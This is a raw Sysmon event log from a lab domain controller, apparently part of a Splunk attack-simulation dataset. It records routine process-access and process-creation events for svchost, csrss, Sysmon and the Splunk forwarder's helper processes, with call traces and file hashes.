13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009591Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009590Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009589Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009588Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:46.026{59A5CD1D-93DA-6005-E004-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009614Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.165{59A5CD1D-93DB-6005-E104-00000000A301}45362484C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009613Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009612Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009611Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009610Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009609Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009608Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009607Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009606Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009605Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009604Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009603Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009602Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009601Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:47.025{59A5CD1D-93DB-6005-E104-00000000A301}4536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009642Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.837{59A5CD1D-93DC-6005-E304-00000000A301}8644724C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009641Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-93DC-6005-E304-00000000A301}864C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009640Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009639Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009638Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009637Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009636Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009635Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:57:48.697{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 